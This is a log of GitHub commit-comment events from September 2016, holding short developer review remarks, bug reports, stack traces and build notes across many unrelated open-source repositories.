{"id":"4583613521","type":"CommitCommentEvent","actor":{"login":"peterbucher"},"repo":{"name":"mocdk/MOC.NotFound"},"payload":{"comment":{"id":19079453,"position":null,"line":null,"path":null,"commit_id":"6b7dea2944b3d49200a9903099fadfdf85973c94","created_at":"2016-09-19T14:26:47Z","updated_at":"2016-09-19T14:26:47Z","body":"It \"seems\" to work now. So the 404 will be displayed, but in the background, there will be thrown an error, like the one before. So something must be still wrong:\r\n\r\n```\r\nException #1426446160: Uri with path \"http://site.dev/404\" could not be found.\r\n\r\n14 MOC\\NotFound\\ViewHelpers\\RequestViewHelper_Original::render(\"404\")\r\n13 call_user_func_array(array|2|, array|1|)\r\n12 TYPO3\\Fluid\\Core\\ViewHelper\\AbstractViewHelper::callRenderMethod()\r\n11 TYPO3\\Fluid\\Core\\ViewHelper\\AbstractViewHelper::initializeArgumentsAndRender()\r\n10 FluidCache_Standalone_template_file_404_2cfc2abbfbe744b0776da72acd2cde34a527c753::{closure}()\r\n9 TYPO3\\Fluid\\Core\\ViewHelper\\AbstractViewHelper::renderChildren()\r\n8 TYPO3\\Fluid\\ViewHelpers\\Format\\RawViewHelper_Original::render(NULL)\r\n7 call_user_func_array(array|2|, array|1|)\r\n6 TYPO3\\Fluid\\Core\\ViewHelper\\AbstractViewHelper::callRenderMethod()\r\n5 TYPO3\\Fluid\\Core\\ViewHelper\\AbstractViewHelper::initializeArgumentsAndRender()\r\n4 FluidCache_Standalone_template_file_404_2cfc2abbfbe744b0776da72acd2cde34a527c753::render(TYPO3\\Fluid\\Core\\Rendering\\RenderingContext)\r\n3 TYPO3\\Fluid\\View\\AbstractTemplateView::render()\r\n2 TYPO3\\Flow\\Error\\DebugExceptionHandler::echoExceptionWeb(TYPO3\\Flow\\Mvc\\Controller\\Exception\\InvalidControllerException)\r\n1 TYPO3\\Flow\\Error\\AbstractExceptionHandler::handleException(TYPO3\\Flow\\Mvc\\Controller\\Exception\\InvalidControllerException)\r\n```"}},"created_at":"2016-09-19T14:26:47Z"}
{"id":"4583613870","type":"CommitCommentEvent","actor":{"login":"nacho-carnicero"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19079456,"position":null,"line":null,"path":null,"commit_id":"8c9f4e8ab88247b098f99fb2f567b1dd8b66ab66","created_at":"2016-09-19T14:26:50Z","updated_at":"2016-09-19T14:26:50Z","body":"Hi, \r\n\r\nI think there's a mistake in the tiltrotor code ([more precisely here](https://github.com/PX4/Firmware/blob/8c9f4e8ab88247b098f99fb2f567b1dd8b66ab66/src/modules/vtol_att_control/tiltrotor.cpp#L247)), because when both TRANSITION_FRONT flags are engaged it means the vehicle is making a transition from multicopter to fixed-wing, and not the opposite as it is coded right now.\r\n\r\nSo the correction would be:\r\n```\r\ncase TRANSITION_FRONT_P1:\r\ncase TRANSITION_FRONT_P2:\r\n\t_vtol_mode = TRANSITION_TO_FW;\r\n\tbreak;\r\n```\r\n\r\nCheers, \r\n\r\nNacho.\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-19T14:26:50Z"}
{"id":"4583613931","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19079457,"position":5,"line":47,"path":"jvm/src/main/scala/RhinoToQuark.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-19T14:26:51Z","updated_at":"2016-09-19T14:26:51Z","body":"@rolivia as a general rule, do not use overloading. It causes confusion.  It's better to give this function a different name."}},"created_at":"2016-09-19T14:26:51Z"}
{"id":"4583614723","type":"CommitCommentEvent","actor":{"login":"stanislavkisyov"},"repo":{"name":"stanislavkisyov/first-repo"},"payload":{"comment":{"id":19079459,"position":null,"line":null,"path":null,"commit_id":"094af107c95fa69dd5a6e33afc39b05f12bb784d","created_at":"2016-09-19T14:26:58Z","updated_at":"2016-09-19T14:26:58Z","body":"Add pictiors"}},"created_at":"2016-09-19T14:26:58Z"}
{"id":"4583618504","type":"CommitCommentEvent","actor":{"login":"Moyster"},"repo":{"name":"divis1969/android_vendor_meizu_meilan2"},"payload":{"comment":{"id":19079470,"position":null,"line":null,"path":null,"commit_id":"d69b1ca050143d660d9cc5864f610ab7de3f86d2","created_at":"2016-09-19T14:27:38Z","updated_at":"2016-09-19T14:27:38Z","body":"Hello,\r\nIt's good to see you didn't stop working on the meilan2 ;)\r\nI worked a bit on a M2 Note rom, I'm sorry I took a few things here without asking, I hope it's ok ! Thank you anyway you did a really great job :)\r\n\r\nDo you mind if I ask a couple questions ? Maybe we can progress and help one another, so far, it's hard to work \"alone\" but a few people I contacted offered their help :)\r\n\r\nYou can find my email on my github profile or answer here\r\n\r\nBest regards"}},"created_at":"2016-09-19T14:27:38Z"}
{"id":"4583618683","type":"CommitCommentEvent","actor":{"login":"clanzen"},"repo":{"name":"clanzen/demoApp"},"payload":{"comment":{"id":19079471,"position":null,"line":null,"path":null,"commit_id":"c9a9fe5685c1bc880460c55dea9620be168509aa","created_at":"2016-09-19T14:27:40Z","updated_at":"2016-09-19T14:27:40Z","body":"another commit comment"}},"created_at":"2016-09-19T14:27:40Z"}
{"id":"4583621192","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19079476,"position":null,"line":null,"path":null,"commit_id":"98a92eeb0f03c121a441903e02508dad21957607","created_at":"2016-09-19T14:28:05Z","updated_at":"2016-09-19T14:28:05Z","body":"@evilaliv3 X_X"}},"created_at":"2016-09-19T14:28:05Z"}
{"id":"4583621358","type":"CommitCommentEvent","actor":{"login":"arcolwill"},"repo":{"name":"arcolwill/EnrageEngine"},"payload":{"comment":{"id":19079477,"position":null,"line":null,"path":null,"commit_id":"1eb4506071e4c70d0ce08bd4749cc972587387d1","created_at":"2016-09-19T14:28:07Z","updated_at":"2016-09-19T14:28:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;gh4T8dw0&#x2F;2-player-blueprint\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Player Blueprint</a>"}},"created_at":"2016-09-19T14:28:07Z"}
{"id":"4583622796","type":"CommitCommentEvent","actor":{"login":"ClaudioSiervi"},"repo":{"name":"ClaudioSiervi/ETL_PDF"},"payload":{"comment":{"id":19079485,"position":12,"line":115,"path":"ExpressoesRegulares.py","commit_id":"b65e6c2f289c92b87c33d1b6540a756a08e9720c","created_at":"2016-09-19T14:28:23Z","updated_at":"2016-09-19T14:28:23Z","body":"As expressões regulares, do subsistema Sul,  utilizadas para extrair a carga recorde e a sua respectiva data devem serem revistas, pois apresentam erros de leitura para quase todos os arquivos."}},"created_at":"2016-09-19T14:28:23Z"}
{"id":"4583623475","type":"CommitCommentEvent","actor":{"login":"falkerson"},"repo":{"name":"ekosareva/os-brick"},"payload":{"comment":{"id":19079486,"position":4,"line":60,"path":"os_brick/initiator/__init__.py","commit_id":"0d79e248170abe02de357791031e7009d08a1243","created_at":"2016-09-19T14:28:29Z","updated_at":"2016-09-19T14:28:29Z","body":"why removed?"}},"created_at":"2016-09-19T14:28:29Z"}
{"id":"4583626606","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19079493,"position":4,"line":862,"path":"src/MainWindow.cpp","commit_id":"55d8905b904ac57cf759db3b235b1ce27ab8c8a5","created_at":"2016-09-19T14:28:59Z","updated_at":"2016-09-19T14:28:59Z","body":"Didn't think of that one, but could be. Are you trying to say that I might break it again with my error-prone regexes? 😆 \r\n\r\nI was thinking of printing to the `SQL Log` window the [`queryPart`][1] variable which looks like it might contain the actual executed SQL.\r\n\r\n  [1]: https://github.com/sqlitebrowser/sqlitebrowser/blob/55d8905b904ac57cf759db3b235b1ce27ab8c8a5/src/MainWindow.cpp#L918"}},"created_at":"2016-09-19T14:28:59Z"}
{"id":"4583628213","type":"CommitCommentEvent","actor":{"login":"bw1984"},"repo":{"name":"SimpleStateManager/SimpleStateManager"},"payload":{"comment":{"id":19079496,"position":null,"line":null,"path":null,"commit_id":"7c4777a6efbcdcb4c611f7cbe93fbb1109f79325","created_at":"2016-09-19T14:29:18Z","updated_at":"2016-09-19T14:29:18Z","body":"any docs for this? "}},"created_at":"2016-09-19T14:29:18Z"}
{"id":"4583634634","type":"CommitCommentEvent","actor":{"login":"awpsawps12"},"repo":{"name":"awpsawps12/FE_React_Todo"},"payload":{"comment":{"id":19079508,"position":27,"line":27,"path":"gulpfile.js","commit_id":"d2ca63ea26d4e676868b578044094132e0201e51","created_at":"2016-09-19T14:30:20Z","updated_at":"2016-09-19T14:30:20Z","body":"是的，但想着这个练习项目很小，所以就没用 Webpack"}},"created_at":"2016-09-19T14:30:20Z"}
{"id":"4583635488","type":"CommitCommentEvent","actor":{"login":"caiqinghua"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":19079510,"position":null,"line":null,"path":null,"commit_id":"9f5c641a4006bd71bf4c2d76c7446cb6e6bfce49","created_at":"2016-09-19T14:30:27Z","updated_at":"2016-09-19T14:30:27Z","body":"@laanwj http://bitcoin.stackexchange.com/questions/48660/how-can-we-receive-hashtx-and-hashblock-from-bitcoind-by-zmq-subscribe"}},"created_at":"2016-09-19T14:30:27Z"}
{"id":"4583636243","type":"CommitCommentEvent","actor":{"login":"awpsawps12"},"repo":{"name":"awpsawps12/FE_React_Todo"},"payload":{"comment":{"id":19079512,"position":7,"line":7,"path":"index.html","commit_id":"d2ca63ea26d4e676868b578044094132e0201e51","created_at":"2016-09-19T14:30:36Z","updated_at":"2016-09-19T14:30:36Z","body":"见上条回复"}},"created_at":"2016-09-19T14:30:36Z"}
{"id":"4583637932","type":"CommitCommentEvent","actor":{"login":"awpsawps12"},"repo":{"name":"awpsawps12/FE_React_Todo"},"payload":{"comment":{"id":19079522,"position":56,"line":56,"path":"src/index.jsx","commit_id":"d2ca63ea26d4e676868b578044094132e0201e51","created_at":"2016-09-19T14:30:52Z","updated_at":"2016-09-19T14:30:52Z","body":"修复一下"}},"created_at":"2016-09-19T14:30:52Z"}
{"id":"4583640013","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19079533,"position":4,"line":862,"path":"src/MainWindow.cpp","commit_id":"55d8905b904ac57cf759db3b235b1ce27ab8c8a5","created_at":"2016-09-19T14:31:15Z","updated_at":"2016-09-19T14:31:15Z","body":"Nah, I'm saying that regex's (done well) are useful. 😀 \r\n\r\nFor the actual code to manage this... I'm not sure, as my head is buried in other non C++ stuff at the moment.  Try things out I guess. :wink:"}},"created_at":"2016-09-19T14:31:15Z"}
{"id":"4583640087","type":"CommitCommentEvent","actor":{"login":"HenryLu1018"},"repo":{"name":"HenryLu1018/leetcode"},"payload":{"comment":{"id":19079534,"position":null,"line":null,"path":null,"commit_id":"2405a0014186649738dd476fc68c9b147fb50a4e","created_at":"2016-09-19T14:31:16Z","updated_at":"2016-09-19T14:31:16Z","body":"3 methods"}},"created_at":"2016-09-19T14:31:16Z"}
{"id":"4583649137","type":"CommitCommentEvent","actor":{"login":"peterjwest"},"repo":{"name":"pusher-community/pusher-synth"},"payload":{"comment":{"id":19079570,"position":null,"line":null,"path":null,"commit_id":"f09647467c91ea4d64251014fd3bffd8121f5e30","created_at":"2016-09-19T14:32:48Z","updated_at":"2016-09-19T14:32:48Z","body":"12 is the number of semitones per octave, kinda important :P"}},"created_at":"2016-09-19T14:32:48Z"}
{"id":"4583652588","type":"CommitCommentEvent","actor":{"login":"joscha"},"repo":{"name":"contra/glob-loader"},"payload":{"comment":{"id":19079583,"position":5,"line":8,"path":"index.js","commit_id":"d600b60bbd574def12be4a7b57adc554dc0f4559","created_at":"2016-09-19T14:33:26Z","updated_at":"2016-09-19T14:33:26Z","body":"loaders should only mark themselves as cacheable if they don't add additional resources via `this.addDependency`."}},"created_at":"2016-09-19T14:33:26Z"}
{"id":"4583655450","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19079596,"position":4,"line":862,"path":"src/MainWindow.cpp","commit_id":"55d8905b904ac57cf759db3b235b1ce27ab8c8a5","created_at":"2016-09-19T14:33:54Z","updated_at":"2016-09-19T14:33:54Z","body":"Ok, I'll make a PR (hopefully) soon :D"}},"created_at":"2016-09-19T14:33:54Z"}
{"id":"4583655605","type":"CommitCommentEvent","actor":{"login":"arcolwill"},"repo":{"name":"arcolwill/EnrageEngine"},"payload":{"comment":{"id":19079599,"position":null,"line":null,"path":null,"commit_id":"6770940a090ca35c1510145873ce6aaf8a5753a1","created_at":"2016-09-19T14:33:56Z","updated_at":"2016-09-19T14:33:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9UDSMLVc&#x2F;1-wooden-crate-blueprint\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Wooden Crate Blueprint</a>"}},"created_at":"2016-09-19T14:33:56Z"}
{"id":"4583655629","type":"CommitCommentEvent","actor":{"login":"arcolwill"},"repo":{"name":"arcolwill/EnrageEngine"},"payload":{"comment":{"id":19079600,"position":null,"line":null,"path":null,"commit_id":"6770940a090ca35c1510145873ce6aaf8a5753a1","created_at":"2016-09-19T14:33:56Z","updated_at":"2016-09-19T14:33:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9UDSMLVc&#x2F;1-wooden-crate-blueprint\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Wooden Crate Blueprint</a>"}},"created_at":"2016-09-19T14:33:56Z"}
{"id":"4583655667","type":"CommitCommentEvent","actor":{"login":"arcolwill"},"repo":{"name":"arcolwill/EnrageEngine"},"payload":{"comment":{"id":19079602,"position":null,"line":null,"path":null,"commit_id":"6770940a090ca35c1510145873ce6aaf8a5753a1","created_at":"2016-09-19T14:33:57Z","updated_at":"2016-09-19T14:33:57Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9UDSMLVc&#x2F;1-wooden-crate-blueprint\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Wooden Crate Blueprint</a>"}},"created_at":"2016-09-19T14:33:57Z"}
{"id":"4583655698","type":"CommitCommentEvent","actor":{"login":"arcolwill"},"repo":{"name":"arcolwill/EnrageEngine"},"payload":{"comment":{"id":19079603,"position":null,"line":null,"path":null,"commit_id":"6770940a090ca35c1510145873ce6aaf8a5753a1","created_at":"2016-09-19T14:33:57Z","updated_at":"2016-09-19T14:33:57Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9UDSMLVc&#x2F;1-wooden-crate-blueprint\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Wooden Crate Blueprint</a>"}},"created_at":"2016-09-19T14:33:57Z"}
{"id":"4583657920","type":"CommitCommentEvent","actor":{"login":"RonnyPfannschmidt"},"repo":{"name":"RedHatQE/widgetastic.core"},"payload":{"comment":{"id":19079615,"position":14,"line":19,"path":"src/widgetastic/log.py","commit_id":"9cea5b3f0908ebdce1551e628d3d3a4df0097be6","created_at":"2016-09-19T14:34:22Z","updated_at":"2016-09-19T14:34:22Z","body":"we should not set the level or set it to a root one"}},"created_at":"2016-09-19T14:34:22Z"}
{"id":"4583660645","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Seaqer/HWLess_3"},"payload":{"comment":{"id":19079621,"position":23,"line":23,"path":"src/com/sbt/Homework.java","commit_id":"3c71526b32de154f4af2e6b843b1ca422f6d3b8b","created_at":"2016-09-19T14:34:48Z","updated_at":"2016-09-19T14:34:48Z","body":"HashSet<String> notRepeatedWords\r\nТе, кто используют notRepeatedWords, не должны ничего знать о конкретной реализации интерфейса Set"}},"created_at":"2016-09-19T14:34:48Z"}
{"id":"4583662206","type":"CommitCommentEvent","actor":{"login":"kbraak"},"repo":{"name":"gbif/registry"},"payload":{"comment":{"id":19079628,"position":49,"line":58,"path":"registry-doi/src/main/java/org/gbif/registry/doi/DataCiteConverter.java","commit_id":"10c25f1d1094cd359a318f6341f79308f49ed77f","created_at":"2016-09-19T14:35:03Z","updated_at":"2016-09-19T14:35:03Z","body":"To help fill in patterns for more id schemes: https://github.com/gbif/registry/blob/master/registry-metadata/src/main/resources/gbif-eml-profile-template/eml-dataset-1.1.ftl#L86"}},"created_at":"2016-09-19T14:35:03Z"}
{"id":"4583671028","type":"CommitCommentEvent","actor":{"login":"mfalesni"},"repo":{"name":"RedHatQE/widgetastic.core"},"payload":{"comment":{"id":19079642,"position":14,"line":19,"path":"src/widgetastic/log.py","commit_id":"9cea5b3f0908ebdce1551e628d3d3a4df0097be6","created_at":"2016-09-19T14:36:33Z","updated_at":"2016-09-19T14:36:33Z","body":"Sure, this is still for convenience purposes ..."}},"created_at":"2016-09-19T14:36:33Z"}
{"id":"4583671685","type":"CommitCommentEvent","actor":{"login":"Fighter19"},"repo":{"name":"stepmania/stepmania"},"payload":{"comment":{"id":19079645,"position":30,"line":42,"path":"src/arch/LowLevelWindow/LowLevelWindow_SDL.cpp","commit_id":"ae10087f41a512141cb6aaad7b57f801db98596e","created_at":"2016-09-19T14:36:41Z","updated_at":"2016-09-19T14:36:41Z","body":"This is not neccessary. SDL_INIT_VIDEO automatically initializes the EVENT subsystem.\r\nBut it also doesn't \"harm\""}},"created_at":"2016-09-19T14:36:41Z"}
{"id":"4583672352","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19079646,"position":null,"line":null,"path":null,"commit_id":"f5bd4b39e06c8af771f34af33df27bacd678b83a","created_at":"2016-09-19T14:36:47Z","updated_at":"2016-09-19T14:36:47Z","body":"Here it explains with a sample set of data -\r\n\r\nUnitedStates.Arkansas.Rogers.boilermaker.limited\r\nUnitedStates.Arkansas.Rogers.calpine.limited\r\nUnitedStates.Arkansas.Bentonville.Boilermaker.limited\r\nUnitedStates.Arkansas.Bentonville.Boilermaker.all\r\nUnitedStates.Arkansas.Bentonville.Boing.all\r\nUnitedStates.Arkansas.Bentonville.calpine.all\r\nUnitedStates.Arkansas.Littlerock.Boilermaker.all\r\n\r\nI should be able to input like this - \r\nUnitedStates.Arkansas.!Rogers.bo*.all\r\n\r\nGetting this query, compose the regex (composeRegex function in the code) like the folllowing dynamically - \r\n(?=.UnitedStates.)(?=.Arkansas.)^(?!.Rogers.)(?=.bo.)(?=.all)\r\n\r\nIt should returns the following elements from the above set \r\nUnitedStates.Arkansas.Bentonville.Boilermaker.all\r\nUnitedStates.Arkansas.Bentonville.Boing.all\r\nUnitedStates.Arkansas.Littlerock.Boilermaker.all\r\n\r\nHope this is clear."}},"created_at":"2016-09-19T14:36:47Z"}
{"id":"4583674644","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19079650,"position":null,"line":null,"path":null,"commit_id":"cc3743210be6fdb755f4b0236e5d92a2f3f72550","created_at":"2016-09-19T14:37:12Z","updated_at":"2016-09-19T14:37:12Z","body":"👯 "}},"created_at":"2016-09-19T14:37:12Z"}
{"id":"4583677942","type":"CommitCommentEvent","actor":{"login":"paulromano"},"repo":{"name":"mit-crpg/openmc"},"payload":{"comment":{"id":19079668,"position":5,"line":18,"path":"tests/travis_install.sh","commit_id":"c54198b7f8f35024cf530a140d4cdc22a8609bc4","created_at":"2016-09-19T14:37:45Z","updated_at":"2016-09-19T14:37:45Z","body":"Lost a slash here!"}},"created_at":"2016-09-19T14:37:45Z"}
{"id":"4583686985","type":"CommitCommentEvent","actor":{"login":"jfkthame"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19079694,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T14:39:19Z","updated_at":"2016-09-19T14:39:19Z","body":">>    We should also reconsider the \"search away from normal\" behavior, in the presence of potentially much finer gradations of weight.\r\n\r\n> We do have to preserve backwards-compatibility, though. It seems like a bad idea to search outwards in intervals of 100 but search any other way in between those points.\r\n\r\nRather than thinking of this in terms of \"search ... in intervals\", we should think of it (IMO) in terms of a distance function that describes how far a descriptor value is from matching a given request. This can be designed to favor one direction over the other -- it doesn't have to just be \"absolute value of the difference between the numbers\" -- while treating a very-near-miss in the less-favored direction as better than a far-away result in the favored direction.\r\n\r\nI envisage a weight-distance function that might be something along these lines:\r\n\r\n    int weight_distance(int request, int desc_min, int desc_max)\r\n    {\r\n      if (request >= desc_min && request <= desc_max)\r\n        return 0; // we have a perfect match\r\n      if (request < desc_min) {\r\n        if (request <= 500) // prefer lighter faces, but this one is heavier, so penalize it\r\n          return (desc_min - request) * 4;\r\n        return (desc_min - request);\r\n      }\r\n      // this face is lighter than requested\r\n      if (request > 500) // prefer heavier faces\r\n        return (request - desc_max) * 4;\r\n      return (request - desc_max);\r\n    }\r\n\r\nThen from the available weights in the family, choose the face for which weight_distance is smallest.\r\n\r\nThis doesn't *exactly* match current behavior, though I suspect it's close enough that it would work well in the real world; it could also be refined further if really required (e.g. with some special-casing for the 400/500 values).\r\n"}},"created_at":"2016-09-19T14:39:19Z"}
{"id":"4583687252","type":"CommitCommentEvent","actor":{"login":"samuelshaner"},"repo":{"name":"mit-crpg/openmc"},"payload":{"comment":{"id":19079695,"position":5,"line":18,"path":"tests/travis_install.sh","commit_id":"c54198b7f8f35024cf530a140d4cdc22a8609bc4","created_at":"2016-09-19T14:39:22Z","updated_at":"2016-09-19T14:39:22Z","body":"Good catch ;) Just fixed it."}},"created_at":"2016-09-19T14:39:22Z"}
{"id":"4583689138","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19079699,"position":null,"line":null,"path":null,"commit_id":"4b1d08727250668b1de3f896b5332f2b9e3df1f4","created_at":"2016-09-19T14:39:42Z","updated_at":"2016-09-19T14:39:42Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2325 of 2330 tests passed, 0 test warnings)\n\n * 5 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: AUD diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: RDD diffs.\n * 3 tests had: MTR big diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T14:39:42Z"}
{"id":"4583689635","type":"CommitCommentEvent","actor":{"login":"shakesoda"},"repo":{"name":"stepmania/stepmania"},"payload":{"comment":{"id":19079700,"position":30,"line":42,"path":"src/arch/LowLevelWindow/LowLevelWindow_SDL.cpp","commit_id":"ae10087f41a512141cb6aaad7b57f801db98596e","created_at":"2016-09-19T14:39:47Z","updated_at":"2016-09-19T14:39:47Z","body":"This should be using SDL_InitSubsystem, not SDL_Init. SDL_Init does things we don't want."}},"created_at":"2016-09-19T14:39:47Z"}
{"id":"4583689813","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Seaqer/HWLess_3"},"payload":{"comment":{"id":19079702,"position":34,"line":34,"path":"src/com/sbt/Homework.java","commit_id":"3c71526b32de154f4af2e6b843b1ca422f6d3b8b","created_at":"2016-09-19T14:39:49Z","updated_at":"2016-09-19T14:39:49Z","body":"Создание Comparator'а лучше отделить от конструктора TreeSet - лучше сам класс компаратора сделать статическим приватным. + Лучше организовать цепочку компараторов - см. java.util.Comparator#thenComparing(java.util.Comparator<? super T>)"}},"created_at":"2016-09-19T14:39:49Z"}
{"id":"4583694121","type":"CommitCommentEvent","actor":{"login":"tobbeanton"},"repo":{"name":"bitcraze/crazyflie-firmware"},"payload":{"comment":{"id":19079718,"position":null,"line":null,"path":null,"commit_id":"b9b1571d3163c4e130dc97a237e9e3183c5027d7","created_at":"2016-09-19T14:40:38Z","updated_at":"2016-09-19T14:40:38Z","body":"I agree! Since I merged the code from sensors_task and that is how it was done there, I left it there just in case. Default way is to monitor gyro variance and when it is low enough (CF2 is stable) we take gyro bias and accelerometer scale."}},"created_at":"2016-09-19T14:40:38Z"}
{"id":"4583695216","type":"CommitCommentEvent","actor":{"login":"bluegr"},"repo":{"name":"csnover/scummvm"},"payload":{"comment":{"id":19079720,"position":12,"line":1016,"path":"engines/sci/engine/savegame.cpp","commit_id":"4a142bdc0e33ebd8353a84867741d64ed7d8c28e","created_at":"2016-09-19T14:40:49Z","updated_at":"2016-09-19T14:40:49Z","body":"There is a reason, yes - we cannot save from within a kernel function - @lskovlun can explain this better"}},"created_at":"2016-09-19T14:40:49Z"}
{"id":"4583696283","type":"CommitCommentEvent","actor":{"login":"jackmitch"},"repo":{"name":"madisongh/meta-tegra"},"payload":{"comment":{"id":19079725,"position":null,"line":null,"path":null,"commit_id":"a50de0d1f8d31796a991c76713c00201d5d08b02","created_at":"2016-09-19T14:41:00Z","updated_at":"2016-09-19T14:41:00Z","body":"This breaks builds without x11 and opengl in their image features. Maybe the libgl stuff should be split out into it's own recipe which can depend on mesa?\r\n\r\nERROR: Nothing PROVIDES 'mesa' (but /home/jack/storage/build/openembedded/meta-tegra.git/recipes-bsp/tegra-binaries/tegra-libraries_24.2.0.bb DEPENDS on or otherwise requires it)\r\nERROR: mesa was skipped: missing required distro feature 'opengl' (not in DISTRO_FEATURES)\r\nERROR: mesa was skipped: missing required distro feature 'opengl' (not in DISTRO_FEATURES)"}},"created_at":"2016-09-19T14:41:00Z"}
{"id":"4583708772","type":"CommitCommentEvent","actor":{"login":"wildefyr"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19079763,"position":null,"line":null,"path":null,"commit_id":"358e309bdb9ab01d7aea786b29d608a21033915c","created_at":"2016-09-19T14:43:13Z","updated_at":"2016-09-19T14:43:13Z","body":"You're not following the proper syntax for git releases. This is also now in the wrong repository."}},"created_at":"2016-09-19T14:43:13Z"}
{"id":"4583709313","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Seaqer/HWLess_3"},"payload":{"comment":{"id":19079764,"position":114,"line":114,"path":"src/com/sbt/Homework.java","commit_id":"3c71526b32de154f4af2e6b843b1ca422f6d3b8b","created_at":"2016-09-19T14:43:18Z","updated_at":"2016-09-19T14:43:18Z","body":"Этот класс должен быть не только приватным, но и статическим.\r\nИли быть оформленным отдельно от класса Homework."}},"created_at":"2016-09-19T14:43:18Z"}
{"id":"4583709969","type":"CommitCommentEvent","actor":{"login":"ShinDarth"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":19079765,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-19T14:43:24Z","updated_at":"2016-09-19T14:43:24Z","body":"@Frytiks  can you [open a PR](https://github.com/azerothcore/azerothcore-wotlk/wiki/Contribute#how-to-create-a-pull-request) please?"}},"created_at":"2016-09-19T14:43:24Z"}
{"id":"4583712988","type":"CommitCommentEvent","actor":{"login":"jsight"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19079769,"position":43,"line":34,"path":"README.md","commit_id":"133853aab91372f640fbe8e438e90e978301fe96","created_at":"2016-09-19T14:43:53Z","updated_at":"2016-09-19T14:43:53Z","body":"npm local installs do not go into the user home, they go into the cwd. Although most of these should not actually be global. I think Ondrej switched them to that for some reason. For example, patternfly as global does nothing. :) Also, we don't need a global typescript as the build uses the locally installed one.\r\n\r\nI'm not 100% sure about Grunt, but it probably doesn't need to be global either (if it is needed at all)."}},"created_at":"2016-09-19T14:43:53Z"}
{"id":"4583715033","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"Seaqer/HWLess_3"},"payload":{"comment":{"id":19079773,"position":115,"line":115,"path":"src/com/sbt/Homework.java","commit_id":"3c71526b32de154f4af2e6b843b1ca422f6d3b8b","created_at":"2016-09-19T14:44:15Z","updated_at":"2016-09-19T14:44:15Z","body":"Явно прошитое знание конкретной реализации списка должно быть исключено.\r\nКак быть, если у меня, например, LinkedList?"}},"created_at":"2016-09-19T14:44:15Z"}
{"id":"4583716128","type":"CommitCommentEvent","actor":{"login":"jackmitch"},"repo":{"name":"madisongh/meta-tegra"},"payload":{"comment":{"id":19079774,"position":null,"line":null,"path":null,"commit_id":"a50de0d1f8d31796a991c76713c00201d5d08b02","created_at":"2016-09-19T14:44:25Z","updated_at":"2016-09-19T14:44:25Z","body":"It's possible it could go even more granular into a -cuda/-camera/-gl package"}},"created_at":"2016-09-19T14:44:25Z"}
